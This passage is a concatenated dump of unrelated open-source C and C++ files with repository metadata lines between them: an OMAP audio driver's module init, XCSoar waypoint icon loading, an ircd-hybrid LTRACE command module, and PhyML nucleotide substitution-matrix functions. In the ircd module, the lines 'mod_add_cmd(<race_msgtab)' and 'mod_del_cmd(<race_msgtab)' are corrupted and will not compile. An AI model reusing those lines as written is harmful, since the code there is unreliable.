	.suspend_pre = bowser_suspend_pre,
	.resume_post = bowser_resume_post,
};

/* "soc-audio" platform device created in bowser_soc_init() */
static struct platform_device *bowser_snd_device;
/*
 * Module init: check the board, acquire and rate-set the codec MCLK,
 * allocate the "soc-audio" platform device, register the Bluetooth DAI
 * and add the device.  Error paths unwind via the goto chain below.
 *
 * Fix vs. original: a snd_soc_register_dais() failure jumped to dai_err,
 * which skipped both platform_device_put() and clk_put(), leaking the
 * freshly allocated device and the clock reference.  It now unwinds
 * through plat_err -> clk_err.
 */
static int __init bowser_soc_init(void)
{
	int ret = 0;

	if (!machine_is_omap_4430sdp() &&
	    !machine_is_omap4_panda() &&
	    !machine_is_omap4_bowser()) {
		pr_debug("Not bowser or PandaBoard!\n");
		return -ENODEV;
	}

	wm8962_mclk = clk_get(NULL, "auxclk0_ck");
	if (IS_ERR(wm8962_mclk)) {
		pr_err("Failed to get WM8962 MCLK: %ld\n",
		       PTR_ERR(wm8962_mclk));
		return -ENODEV;
	}

	pr_debug("Old codec mclk rate = %lu\n", clk_get_rate(wm8962_mclk));
	ret = clk_set_rate(wm8962_mclk, WM8962_MCLK_RATE);
	if (ret < 0) {
		pr_err("Failed to set MCLK rate: %d\n", ret);
		goto clk_err;
	}
	pr_debug("New codec mclk rate = %lu\n", clk_get_rate(wm8962_mclk));

	bowser_snd_device = platform_device_alloc("soc-audio", -1);
	if (!bowser_snd_device) {
		printk(KERN_ERR "Platform device allocation failed\n");
		ret = -ENOMEM;
		goto clk_err;
	}

	ret = snd_soc_register_dais(&bowser_snd_device->dev,
				    bt_dai, ARRAY_SIZE(bt_dai));
	if (ret < 0)
		goto plat_err;	/* was "goto dai_err": leaked device + clk */

	platform_set_drvdata(bowser_snd_device, &snd_soc_bowser);

	ret = platform_device_add(bowser_snd_device);
	if (ret) {
		pr_err("Couldn't add bowser snd device ret: %d\n", ret);
		goto plat_err;
	}

/*	av_switch_reg = regulator_get(&bowser_snd_device->dev, "av-switch");
	if (IS_ERR(av_switch_reg)) {
		ret = PTR_ERR(av_switch_reg);
		printk(KERN_ERR "couldn't get AV Switch regulator %d\n",
		       ret);
		goto reg_err;
	}*/

	return ret;

reg_err:	/* only reachable from the commented-out regulator code */
	platform_device_del(bowser_snd_device);
plat_err:
	platform_device_put(bowser_snd_device);
clk_err:
	clk_put(wm8962_mclk);
	return ret;
}
module_init(bowser_soc_init);
/* Module unload: unregister the sound device and drop the MCLK reference. */
static void __exit bowser_soc_exit(void)
{
/*	regulator_put(av_switch_reg); */
	platform_device_unregister(bowser_snd_device);
	clk_put(wm8962_mclk);
}
module_exit(bowser_soc_exit);

MODULE_AUTHOR("Misael Lopez Cruz <x0052729@ti.com>");
MODULE_DESCRIPTION("ALSA SoC bowser");
MODULE_LICENSE("GPL");
| gpl-2.0 |
onkelhotte/XCSoar | src/Look/WaypointLook.cpp | 2 | 3974 | /*
Copyright_License {
XCSoar Glide Computer - http://www.xcsoar.org/
Copyright (C) 2000-2013 The XCSoar Project
A detailed list of copyright holders can be found in the file "AUTHORS".
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
}
*/
#include "WaypointLook.hpp"
#include "Renderer/WaypointRendererSettings.hpp"
#include "resource.h"
/**
 * Load all waypoint icons and brushes.  The landable (airport/outfield)
 * icon set depends on the configured landable style; everything else is
 * style-independent.  Each Load() takes a normal- and a high-DPI resource.
 */
void
WaypointLook::Initialise(const WaypointRendererSettings &settings)
{
  // Style-independent waypoint icons.
  small_icon.Load(IDB_SMALL, IDB_SMALL_HD);
  turn_point_icon.Load(IDB_TURNPOINT, IDB_TURNPOINT_HD);
  task_turn_point_icon.Load(IDB_TASKTURNPOINT, IDB_TASKTURNPOINT_HD);
  mountain_top_icon.Load(IDB_MOUNTAIN_TOP, IDB_MOUNTAIN_TOP_HD);
  mountain_pass_icon.Load(IDB_MOUNTAIN_PASS, IDB_MOUNTAIN_PASS_HD);
  bridge_icon.Load(IDB_BRIDGE, IDB_BRIDGE_HD);
  tunnel_icon.Load(IDB_TUNNEL, IDB_TUNNEL_HD);
  tower_icon.Load(IDB_TOWER, IDB_TOWER_HD);
  power_plant_icon.Load(IDB_POWER_PLANT, IDB_POWER_PLANT_HD);
  obstacle_icon.Load(IDB_OBSTACLE, IDB_OBSTACLE_HD);

  // Brushes used when painting waypoint symbols.
  reachable_brush.Set(COLOR_GREEN);
  terrain_unreachable_brush.Set(LightColor(COLOR_RED));
  unreachable_brush.Set(COLOR_RED);
  white_brush.Set(COLOR_WHITE);
  light_gray_brush.Set(COLOR_LIGHT_GRAY);
  magenta_brush.Set(COLOR_MAGENTA);
  orange_brush.Set(COLOR_ORANGE);

  // Landable icons: three icon sets selected by user preference.
  switch (settings.landable_style) {
  case WaypointRendererSettings::LandableStyle::PURPLE_CIRCLE:
    // Classic style: same reachable/marginal/landable icons for
    // airports and outlanding fields.
    airport_reachable_icon.Load(IDB_REACHABLE, IDB_REACHABLE_HD);
    airport_marginal_icon.Load(IDB_MARGINAL, IDB_MARGINAL_HD);
    airport_unreachable_icon.Load(IDB_LANDABLE, IDB_LANDABLE_HD);
    field_reachable_icon.Load(IDB_REACHABLE, IDB_REACHABLE_HD);
    field_marginal_icon.Load(IDB_MARGINAL, IDB_MARGINAL_HD);
    field_unreachable_icon.Load(IDB_LANDABLE, IDB_LANDABLE_HD);
    break;

  case WaypointRendererSettings::LandableStyle::BW:
    // Black & white style with distinct airport/outfield icons.
    airport_reachable_icon.Load(IDB_AIRPORT_REACHABLE,
                                IDB_AIRPORT_REACHABLE_HD);
    airport_marginal_icon.Load(IDB_AIRPORT_MARGINAL,
                               IDB_AIRPORT_MARGINAL_HD);
    airport_unreachable_icon.Load(IDB_AIRPORT_UNREACHABLE,
                                  IDB_AIRPORT_UNREACHABLE_HD);
    field_reachable_icon.Load(IDB_OUTFIELD_REACHABLE,
                              IDB_OUTFIELD_REACHABLE_HD);
    field_marginal_icon.Load(IDB_OUTFIELD_MARGINAL,
                             IDB_OUTFIELD_MARGINAL_HD);
    field_unreachable_icon.Load(IDB_OUTFIELD_UNREACHABLE,
                                IDB_OUTFIELD_UNREACHABLE_HD);
    break;

  case WaypointRendererSettings::LandableStyle::TRAFFIC_LIGHTS:
    // Traffic-light style: alternate "2" variants for marginal and
    // unreachable states.
    airport_reachable_icon.Load(IDB_AIRPORT_REACHABLE,
                                IDB_AIRPORT_REACHABLE_HD);
    airport_marginal_icon.Load(IDB_AIRPORT_MARGINAL2,
                               IDB_AIRPORT_MARGINAL2_HD);
    airport_unreachable_icon.Load(IDB_AIRPORT_UNREACHABLE2,
                                  IDB_AIRPORT_UNREACHABLE2_HD);
    field_reachable_icon.Load(IDB_OUTFIELD_REACHABLE,
                              IDB_OUTFIELD_REACHABLE_HD);
    field_marginal_icon.Load(IDB_OUTFIELD_MARGINAL2,
                             IDB_OUTFIELD_MARGINAL2_HD);
    field_unreachable_icon.Load(IDB_OUTFIELD_UNREACHABLE2,
                                IDB_OUTFIELD_UNREACHABLE2_HD);
    break;
  }
}
| gpl-2.0 |
asterIRC/hamsterbox | contrib/m_ltrace.c | 2 | 9135 | /*
* ircd-hybrid: an advanced Internet Relay Chat Daemon(ircd).
* m_ltrace.c: Traces a path to a client/server.
*
* Copyright (C) 2002 Hybrid Development Team
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
* USA
*
* $Id: m_ltrace.c 131 2005-12-10 04:59:29Z jon $
*/
#include "stdinc.h"
#include "handlers.h"
#include "tools.h"
#include "hook.h"
#include "client.h"
#include "common.h"
#include "hash.h"
#include "irc_string.h"
#include "ircd.h"
#include "numeric.h"
#include "fdlist.h"
#include "s_bsd.h"
#include "s_serv.h"
#include "s_conf.h"
#include "send.h"
#include "msg.h"
#include "parse.h"
#include "modules.h"
#include "irc_getnameinfo.h"
static void do_ltrace(struct Client *, int, char **);
static void m_ltrace(struct Client *, struct Client *, int, char **);
static void mo_ltrace(struct Client *, struct Client *, int, char **);
/* LTRACE dispatch table: unregistered clients -> m_unregistered, normal
 * users -> m_ltrace (reveals nothing), opers/servers -> mo_ltrace. */
struct Message ltrace_msgtab = {
	"LTRACE", 0, 0, 0, 0, MFLG_SLOW, 0,
	{m_unregistered, m_ltrace, mo_ltrace, m_ignore, mo_ltrace, m_ignore}
};
#ifndef STATIC_MODULES
const char *_version = "$Revision: 131 $";
static struct Callback *ltrace_cb;
static void *
va_ltrace(va_list args)
{
struct Client *source_p = va_arg(args, struct Client *);
int parc = va_arg(args, int);
char **parv = va_arg(args, char **);
do_ltrace(source_p, parc, parv);
return NULL;
}
void
_modinit(void)
{
ltrace_cb = register_callback("doing_ltrace", va_ltrace);
mod_add_cmd(<race_msgtab);
}
void
_moddeinit(void)
{
mod_del_cmd(<race_msgtab);
uninstall_hook(ltrace_cb, va_ltrace);
}
#endif
static int report_this_status(struct Client *source_p, struct Client *target_p, int dow,
int link_u_p, int link_u_s);
/*
* m_ltrace()
*
* parv[0] = sender prefix
* parv[1] = target client/server to trace
*/
/*
 * m_ltrace - LTRACE handler for normal (non-oper) users.  Traces reveal
 * nothing to them, so just close the reply with RPL_ENDOFTRACE for the
 * requested target (or this server when none was given).
 */
static void
m_ltrace(struct Client *client_p, struct Client *source_p, int parc, char *parv[])
{
  char *tname = (parc > 1) ? parv[1] : me.name;

  sendto_one(source_p, form_str(RPL_ENDOFTRACE), me.name, parv[0], tname);
}
/*
* do_ltrace
*/
/*
 * do_ltrace - core of the LTRACE command.  Either forwards the request
 * toward the target server (HUNTED_PASS), or, when this server is the
 * target, reports matching local opers and linked servers via
 * report_this_status() and closes with RPL_ENDOFTRACE.
 */
static void
do_ltrace(struct Client *source_p, int parc, char **parv)
{
  struct Client *target_p = NULL;
  int doall;                       /* tracing this whole server?        */
  int wilds, dow;                  /* wildcard target / "do wildcards"  */
  dlink_node *ptr;
  char *looking_for = parv[0];
  char *tname = parc > 1 ? parv[1] : me.name;

  switch (hunt_server(source_p->from, source_p, ":%s LTRACE :%s", 1, parc, parv))
  {
    case HUNTED_PASS: /* note: gets here only if parv[1] exists */
    {
      struct Client *ac2ptr = NULL;

      /* find the next hop for the trace-link notice: exact match first,
       * then a wildcard scan over all known clients */
      if((ac2ptr = find_client(tname)) == NULL)
        DLINK_FOREACH(ptr, global_client_list.head)
        {
          ac2ptr = ptr->data;
          if(match(tname, ac2ptr->name) || match(ac2ptr->name, tname))
            break;
          else
            ac2ptr = NULL;
        }

      if(ac2ptr != NULL)
        sendto_one(source_p, form_str(RPL_TRACELINK), me.name, looking_for,
                   ircd_version, tname, ac2ptr->from->name);
      else
        sendto_one(source_p, form_str(RPL_TRACELINK), me.name, looking_for,
                   ircd_version, tname, "ac2ptr_is_NULL!!");
      return;
    }
    case HUNTED_ISME:
      break;
    default:
      return;
  }

  /* doall: target names this server (or no target given);
   * wilds: target contains mask characters */
  doall = (parv[1] && (parc > 1)) ? match(tname, me.name) : TRUE;
  wilds = !parv[1] || strchr(tname, '*') || strchr(tname, '?');
  dow = wilds || doall;

  /* lusers cant issue ltrace.. */
  if(!dow)
  {
    /* non-wildcard target: report just that one client (opers only) */
    const char *name;
    const char *class_name;
    char ipaddr[HOSTIPLEN];

    target_p = find_client(tname);

    if(target_p && IsClient(target_p))
    {
      name = get_client_name(target_p, HIDE_IP);
      /* Should this be sockhost? - stu */
      irc_getnameinfo((struct sockaddr *) &target_p->localClient->ip,
                      target_p->localClient->ip.ss_len, ipaddr,
                      HOSTIPLEN, NULL, 0, NI_NUMERICHOST);
      class_name = get_client_class(target_p);

      if(IsOper(target_p))
      {
        /* NOTE(review): both arms of this hide_spoof_ips branch send
         * exactly the same reply — presumably the else-arm was meant to
         * expose the real IP; confirm against upstream before changing. */
        if(ConfigFileEntry.hide_spoof_ips)
          sendto_one(source_p, form_str(RPL_TRACEOPERATOR),
                     me.name, source_p->name, class_name, name,
                     (IsIPSpoof(target_p) ? "255.255.255.255" :
                      ipaddr), CurrentTime - target_p->lasttime,
                     CurrentTime - target_p->localClient->last);
        else
          sendto_one(source_p, form_str(RPL_TRACEOPERATOR),
                     me.name, source_p->name, class_name, name,
                     (IsIPSpoof(target_p) ? "255.255.255.255" :
                      ipaddr), CurrentTime - target_p->lasttime,
                     CurrentTime - target_p->localClient->last);
      }
    }

    sendto_one(source_p, form_str(RPL_ENDOFTRACE), me.name, source_p->name, tname);
    return;
  }

  /* report all opers */
  DLINK_FOREACH(ptr, local_client_list.head)
  {
    target_p = ptr->data;

    if(!IsOper(target_p))
      continue;
    if(!doall && wilds && !match(tname, target_p->name))
      continue;
    if(!dow && irccmp(tname, target_p->name))
      continue;

    report_this_status(source_p, target_p, dow, 0, 0);
  }

  /* report all servers */
  DLINK_FOREACH(ptr, serv_list.head)
  {
    target_p = ptr->data;

    if(!doall && wilds && !match(tname, target_p->name))
      continue;
    if(!dow && irccmp(tname, target_p->name))
      continue;

    /* pass the dependent user/server counts for RPL_TRACESERVER */
    report_this_status(source_p, target_p, dow, target_p->serv->dep_users,
                       target_p->serv->dep_servers);
  }

  sendto_one(source_p, form_str(RPL_ENDOFTRACE), me.name, parv[0], tname);
}
/*
* mo_ltrace
* parv[0] = sender prefix
* parv[1] = servername
*/
/*
 * mo_ltrace - LTRACE handler for opers/servers.  Non-opers get an empty
 * trace; otherwise the request is optionally forwarded (3-arg form) and
 * then executed locally, either directly or through the hook chain so
 * other modules can observe "doing_ltrace".
 */
static void
mo_ltrace(struct Client *client_p, struct Client *source_p, int parc, char *parv[])
{
  if(!IsOper(source_p))
  {
    /* same reply a plain user would get: just end the trace */
    sendto_one(source_p, form_str(RPL_ENDOFTRACE), me.name, parv[0],
               parc > 1 ? parv[1] : me.name);
    return;
  }

  /* "LTRACE <target> <server>": hand off to the named server */
  if(parc > 2)
    if(hunt_server(client_p, source_p, ":%s LTRACE %s :%s", 2, parc, parv))
      return;

#ifdef STATIC_MODULES
  do_ltrace(source_p, parc, parv);
#else
  execute_callback(ltrace_cb, source_p, parc, parv);
#endif
}
/*
* report_this_status
*
* inputs - pointer to client to report to
* - pointer to client to report about
* output - counter of number of hits
* side effects - NONE
*/
/*
 * report_this_status
 *
 * inputs	- pointer to client to report to
 *		- pointer to client to report about
 *		- dow: wildcard/whole-server trace in progress
 *		- link_u_p / link_s_p: dependent user/server counts
 *		  (servers only; both zero for opers)
 * output	- counter of number of hits (currently always 0)
 * side effects	- sends one RPL_TRACE* numeric describing target_p
 */
static int
report_this_status(struct Client *source_p, struct Client *target_p,
                   int dow, int link_u_p, int link_s_p)
{
  const char *name = NULL;
  const char *class_name = NULL;
  char ip[HOSTIPLEN];

  /* Should this be sockhost? - stu */
  /* NOTE(review): target_p->localClient is dereferenced unconditionally;
   * callers only pass locally-connected clients/servers, which is what
   * makes this safe — confirm before reusing elsewhere. */
  irc_getnameinfo((struct sockaddr *) &target_p->localClient->ip,
                  target_p->localClient->ip.ss_len, ip, HOSTIPLEN, NULL, 0, NI_NUMERICHOST);
  name = get_client_name(target_p, HIDE_IP);
  class_name = get_client_class(target_p);

  switch (target_p->status)
  {
    case STAT_CONNECTING:
      sendto_one(source_p, form_str(RPL_TRACECONNECTING), me.name,
                 source_p->name, class_name, IsAdmin(source_p) ? name : target_p->name);
      break;
    case STAT_HANDSHAKE:
      sendto_one(source_p, form_str(RPL_TRACEHANDSHAKE), me.name,
                 source_p->name, class_name, IsAdmin(source_p) ? name : target_p->name);
      break;
    case STAT_CLIENT:
      if(IsAdmin(target_p))
      {
        /* admins: show the real IP only to requesting admins when
         * spoof-hiding is off */
        if(ConfigFileEntry.hide_spoof_ips)
          sendto_one(source_p, form_str(RPL_TRACEOPERATOR),
                     me.name, source_p->name, class_name, name,
                     (IsIPSpoof(target_p) ? "255.255.255.255" : ip),
                     CurrentTime - target_p->lasttime,
                     CurrentTime - target_p->localClient->last);
        else
          sendto_one(source_p, form_str(RPL_TRACEOPERATOR),
                     me.name, source_p->name, class_name, name,
                     IsAdmin(source_p) ? ip :
                     (IsIPSpoof(target_p) ? "255.255.255.255" : ip),
                     CurrentTime - target_p->lasttime,
                     CurrentTime - target_p->localClient->last);
      }
      else if(IsOper(target_p))
      {
        /* NOTE(review): both arms below send identical replies —
         * presumably the else-arm was meant to show the real IP;
         * confirm against upstream ircd-hybrid before changing. */
        if(ConfigFileEntry.hide_spoof_ips)
          sendto_one(source_p, form_str(RPL_TRACEOPERATOR),
                     me.name, source_p->name, class_name, name,
                     (IsIPSpoof(target_p) ? "255.255.255.255" : ip),
                     CurrentTime - target_p->lasttime,
                     CurrentTime - target_p->localClient->last);
        else
          sendto_one(source_p, form_str(RPL_TRACEOPERATOR),
                     me.name, source_p->name, class_name, name,
                     (IsIPSpoof(target_p) ? "255.255.255.255" : ip),
                     CurrentTime - target_p->lasttime,
                     CurrentTime - target_p->localClient->last);
      }
      break;
    case STAT_SERVER:
      /* non-admins see a masked server name */
      if(!IsAdmin(source_p))
        name = get_client_name(target_p, MASK_IP);

      sendto_one(source_p, form_str(RPL_TRACESERVER),
                 me.name, source_p->name, class_name, link_s_p,
                 link_u_p, name, *(target_p->serv->by) ?
                 target_p->serv->by : "*", "*",
                 me.name, CurrentTime - target_p->lasttime);
      break;
    case STAT_ME:
    case STAT_UNKNOWN:
      break;
    default: /* ...we actually shouldn't come here... --msa */
      sendto_one(source_p, form_str(RPL_TRACENEWTYPE), me.name, source_p->name, name);
      break;
  }

  return 0;
}
| gpl-2.0 |
Ensembl/treebest | phyml/models.c | 2 | 83965 | /*
PHYML : a program that computes maximum likelihood phylogenies from
DNA or AA homologous sequences
Copyright (C) Stephane Guindon. Oct 2003 onward
All parts of the source except where indicated are distributed under
the GNU public licence. See http://www.opensource.org for details.
*/
#include "utilities.h"
#include "models.h"
#include "eigen.h"
#include "free.h"
/*********************************************************/
void PMat_K80(double l,double kappa, double ***Pij)
{
double Ts,Tv,e1,e2,aux;
/*0 => A*/
/*1 => C*/
/*2 => G*/
/*3 => T*/
/* Ts -> transition*/
/* Tv -> transversion*/
aux = -2*l/(kappa+2);
e1 = exp(aux *2);
if (1.0!=kappa)
{
e2 = exp(aux *(kappa+1));
Tv = .25*(1-e1);
Ts = .25*(1+e1-2*e2);
}
else
{
Ts = Tv = .25*(1-e1);
}
(*Pij)[0][1] = (*Pij)[1][0] = Tv;
(*Pij)[0][2] = (*Pij)[2][0] = Ts;
(*Pij)[0][3] = (*Pij)[3][0] = Tv;
(*Pij)[1][2] = (*Pij)[2][1] = Tv;
(*Pij)[1][3] = (*Pij)[3][1] = Ts;
(*Pij)[2][3] = (*Pij)[3][2] = Tv;
(*Pij)[0][0] = (*Pij)[1][1] =
(*Pij)[2][2] = (*Pij)[3][3] = 1.-Ts-2.*Tv;
}
/*********************************************************/
void dPMat_K80(double l, double ***dPij, double rr, double k)
{
double aux,e1,e2;
double dTsl,dTsk;
double dTvl,dTvk;
/* Ts -> transition*/
/* Tv -> transversion*/
aux = -2.*l*rr/(k+2.);
e1 = exp(aux *2);
if (1.0!=k)
e2 = exp(aux *(k+1));
else
e2 = e1;
dTsl = -rr/(k+2) * e1 + rr*(k+1)/(k+2) * e2;
dTvl = rr/(k+2) * e1;
dTsk = l/pow(k+2,2) * (e1 + e2);
dTvk = l/pow(k+2,2) * e1;
/*First derivatives*/
/* branch lengths */
(*dPij)[0][0] = (*dPij)[1][1] =
(*dPij)[2][2] = (*dPij)[3][3] = -dTsl-2*dTvl;
(*dPij)[0][1] = (*dPij)[1][0] = dTvl;
(*dPij)[0][2] = (*dPij)[2][0] = dTsl;
(*dPij)[0][3] = (*dPij)[3][0] = dTvl;
(*dPij)[1][2] = (*dPij)[2][1] = dTvl;
(*dPij)[1][3] = (*dPij)[3][1] = dTsl;
(*dPij)[2][3] = (*dPij)[3][2] = dTvl;
}
/*********************************************************/
void d2PMat_K80(double l, double ***d2Pij, double rr, double k)
{
double e1,e2,aux,aux2,aux3,aux4;
double d2Tsl,d2Tsk;
double d2Tvl,d2Tvk;
/* Ts -> transition*/
/* Tv -> transversion*/
aux = -2.*l*rr/(k+2.);
e1 = exp(aux *2);
if (1.0!=k)
e2 = exp(aux *(k+1));
else
e2 = e1;
aux2 = rr*rr/pow(k+2,2);
aux3 = l /pow(k+2,3);
aux4 = l *l /pow(k+2,4);
d2Tvl = -4.*aux2 * e1;
d2Tsl = -d2Tvl -2*aux2 *pow((k+1),2) * e2;
d2Tvk = -2*aux3 * e1 + 4*aux4 * e1;
d2Tsk = d2Tvk -2*aux3 * e2 - 2*aux4 * e2;
/*Scnd derivatives*/
/* branch lengths */
(*d2Pij)[0][0] = (*d2Pij)[1][1] =
(*d2Pij)[2][2] = (*d2Pij)[3][3] = -d2Tsl-2*d2Tvl;
(*d2Pij)[0][1] = (*d2Pij)[1][0] = d2Tvl;
(*d2Pij)[0][2] = (*d2Pij)[2][0] = d2Tsl;
(*d2Pij)[0][3] = (*d2Pij)[3][0] = d2Tvl;
(*d2Pij)[1][2] = (*d2Pij)[2][1] = d2Tvl;
(*d2Pij)[1][3] = (*d2Pij)[3][1] = d2Tsl;
(*d2Pij)[2][3] = (*d2Pij)[3][2] = d2Tvl;
}
/*********************************************************/
void PMat_TN93(double l, model *mod, double ***Pij)
{
/* Fill (*Pij), the 4x4 nucleotide substitution probability matrix, under
 * the Tamura-Nei (TN93) family of models for branch length l.
 * State order: 0=A, 1=C, 2=G, 3=T (from the mod->pi indexing below).
 *
 * Side effects: overwrites mod->lambda, and may INCREASE mod->kappa when
 * the requested transition/transversion ratio is infeasible for the given
 * base frequencies (a warning is printed unless kappa is being optimised).
 * NOTE(review): the meaning of the mod->whichmodel codes (<5, ==5) is
 * defined elsewhere; presumably 5 selects TN93 proper — confirm.
 */
int i,j;
double e1,e2,e3;
double a1t,a2t,bt;
double A,C,G,T,R,Y;
double kappa1,kappa2;
int kappa_has_changed;
A = mod->pi[0]; C = mod->pi[1]; G = mod->pi[2]; T = mod->pi[3];
/* R, Y: total purine / pyrimidine frequencies */
R = A+G; Y = T+C;
kappa_has_changed = 0;
/* guard against a negative ts/tv ratio */
if(mod->kappa < .0) mod->kappa = 1.0e-5;
if(mod->whichmodel < 5) { mod->lambda = 1.; }
else if(mod->whichmodel == 5)
{
/* solve for lambda; a negative solution means the (kappa, pi) pair is
 * infeasible, so kappa is inflated by 10% until lambda becomes valid */
do
{
mod->lambda = (Y+(R-Y)/(2.*mod->kappa))/(R-(R-Y)/(2.*mod->kappa));
if(mod->lambda < .0)
{
mod->kappa += mod->kappa/10.;
kappa_has_changed = 1;
}
}while(mod->lambda < .0);
}
/* warn only when kappa is held fixed and had to be changed above */
if((!mod->s_opt->opt_kappa) && (kappa_has_changed))
{
printf("\n. WARNING: This transition/transversion ratio\n");
printf(" is impossible with these base frequencies!\n");
printf(" The ratio is now set to %.3f\n",mod->kappa);
}
/* kappa1/kappa2: purine / pyrimidine transition rate factors */
kappa2 = mod->kappa*2./(1.+mod->lambda);
kappa1 = kappa2 * mod->lambda;
/* bt scales time so that l is the expected number of substitutions */
bt = l/(2.*(A*G*kappa1+C*T*kappa2+R*Y));
a1t = kappa1;
a2t = kappa2;
a1t*=bt; a2t*=bt;
/* the three exponential terms of the TN93 closed-form solution */
e1 = exp(-a1t*R-bt*Y);
e2 = exp(-a2t*Y-bt*R);
e3 = exp(-bt);
/*A->A*/(*Pij)[0][0] = A+Y*A/R*e3+G/R*e1;
/*A->C*/(*Pij)[0][1] = C*(1-e3);
/*A->G*/(*Pij)[0][2] = G+Y*G/R*e3-G/R*e1;
/*A->T*/(*Pij)[0][3] = T*(1-e3);
/*C->A*/(*Pij)[1][0] = A*(1-e3);
/*C->C*/(*Pij)[1][1] = C+R*C/Y*e3+T/Y*e2;
/*C->G*/(*Pij)[1][2] = G*(1-e3);
/*C->T*/(*Pij)[1][3] = T+R*T/Y*e3-T/Y*e2;
/*G->A*/(*Pij)[2][0] = A+Y*A/R*e3-A/R*e1;
/*G->C*/(*Pij)[2][1] = C*(1-e3);
/*G->G*/(*Pij)[2][2] = G+Y*G/R*e3+A/R*e1;
/*G->T*/(*Pij)[2][3] = T*(1-e3);
/*T->A*/(*Pij)[3][0] = A*(1-e3);
/*T->C*/(*Pij)[3][1] = C+R*C/Y*e3-C/Y*e2;
/*T->G*/(*Pij)[3][2] = G*(1-e3);
/*T->T*/(*Pij)[3][3] = T+R*T/Y*e3+C/Y*e2;
/* clamp tiny probabilities so later logs/divisions stay finite */
For(i,4) For(j,4)
if((*Pij)[i][j] < MDBL_MIN) (*Pij)[i][j] = MDBL_MIN;
}
/*********************************************************/
void dPMat_TN93(double l, double ***dPij, model *mod, double rr)
{
/* First derivative, with respect to the branch length l, of the TN93
 * substitution probability matrix (cf. PMat_TN93).
 * rr is the relative rate multiplying l; the result goes into (*dPij).
 * State order: 0=A, 1=C, 2=G, 3=T.
 * Side effect: overwrites mod->lambda (same convention as PMat_TN93).
 */
double k1,k2;          /* purine / pyrimidine transition rate factors */
double d_e1,d_e2,d_e3; /* derivatives of the three exponential terms  */
double fA,fC,fG,fT;    /* base frequencies                            */
double pur,pyr;        /* purine / pyrimidine totals                  */
double norm;           /* rate normalisation constant                 */

fA = mod->pi[0];
fC = mod->pi[1];
fG = mod->pi[2];
fT = mod->pi[3];
pur = fA+fG;
pyr = fC+fT;

if(mod->whichmodel < 5)
{
mod->lambda = 1.;
}
else if(mod->whichmodel == 5)
{
mod->lambda = (pyr+(pur-pyr)/(2.*mod->kappa))/(pur-(pur-pyr)/(2.*mod->kappa));
}

k2 = mod->kappa*2./(1.+mod->lambda);
k1 = k2 * mod->lambda;

norm = 2.*fA*fG*k1+2.*fC*fT*k2+2.*pur*pyr;

d_e1 = -rr*(k1*pur/norm + pyr/norm)*exp(-k1*pur/norm*l*rr-pyr/norm*l*rr);
d_e2 = -rr*(k2*pyr/norm + pur/norm)*exp(-k2*pyr/norm*l*rr-pur/norm*l*rr);
d_e3 = -rr/norm*exp(-l*rr/norm);

(*dPij)[0][0] = pyr*fA/pur*d_e3+fG/pur*d_e1;  /* A->A */
(*dPij)[0][1] = -fC*d_e3;                     /* A->C */
(*dPij)[0][2] = pyr*fG/pur*d_e3-fG/pur*d_e1;  /* A->G */
(*dPij)[0][3] = -fT*d_e3;                     /* A->T */
(*dPij)[1][0] = -fA*d_e3;                     /* C->A */
(*dPij)[1][1] = pur*fC/pyr*d_e3+fT/pyr*d_e2;  /* C->C */
(*dPij)[1][2] = -fG*d_e3;                     /* C->G */
(*dPij)[1][3] = pur*fT/pyr*d_e3-fT/pyr*d_e2;  /* C->T */
(*dPij)[2][0] = pyr*fA/pur*d_e3-fA/pur*d_e1;  /* G->A */
(*dPij)[2][1] = -fC*d_e3;                     /* G->C */
(*dPij)[2][2] = pyr*fG/pur*d_e3+fA/pur*d_e1;  /* G->G */
(*dPij)[2][3] = -fT*d_e3;                     /* G->T */
(*dPij)[3][0] = -fA*d_e3;                     /* T->A */
(*dPij)[3][1] = pur*fC/pyr*d_e3-fC/pyr*d_e2;  /* T->C */
(*dPij)[3][2] = -fG*d_e3;                     /* T->G */
(*dPij)[3][3] = pur*fT/pyr*d_e3+fC/pyr*d_e2;  /* T->T */
}
/*********************************************************/
void d2PMat_TN93(double l, double ***d2Pij, model *mod, double rr)
{
/* Second derivative, with respect to the branch length l, of the TN93
 * substitution probability matrix (cf. PMat_TN93 / dPMat_TN93).
 * rr is the relative rate multiplying l; the result goes into (*d2Pij).
 * State order: 0=A, 1=C, 2=G, 3=T.
 * Side effect: overwrites mod->lambda (same convention as PMat_TN93).
 */
double k1,k2;             /* purine / pyrimidine transition rate factors  */
double c1,c2,c3;          /* linear decay coefficients of the exp terms   */
double dd_e1,dd_e2,dd_e3; /* second derivatives of the exponential terms  */
double fA,fC,fG,fT;       /* base frequencies                             */
double pur,pyr;           /* purine / pyrimidine totals                   */
double norm;              /* rate normalisation constant                  */

fA = mod->pi[0];
fC = mod->pi[1];
fG = mod->pi[2];
fT = mod->pi[3];
pur = fA+fG;
pyr = fC+fT;

if(mod->whichmodel < 5)
{
mod->lambda = 1.;
}
else if(mod->whichmodel == 5)
{
mod->lambda = (pyr+(pur-pyr)/(2.*mod->kappa))/(pur-(pur-pyr)/(2.*mod->kappa));
}

k2 = mod->kappa*2./(1.+mod->lambda);
k1 = k2 * mod->lambda;

norm = 2.*fA*fG*k1+2.*fC*fT*k2+2.*pur*pyr;

/* each term is c*c*exp(c' * l): square the coefficient once */
c1 = -rr*(k1*pur/norm + pyr/norm);
c2 = -rr*(k2*pyr/norm + pur/norm);
c3 = -rr/norm;
dd_e1 = c1*c1*exp(-k1*pur/norm*l*rr-pyr/norm*l*rr);
dd_e2 = c2*c2*exp(-k2*pyr/norm*l*rr-pur/norm*l*rr);
dd_e3 = c3*c3*exp(-l*rr/norm);

(*d2Pij)[0][0] = pyr*fA/pur*dd_e3+fG/pur*dd_e1;  /* A->A */
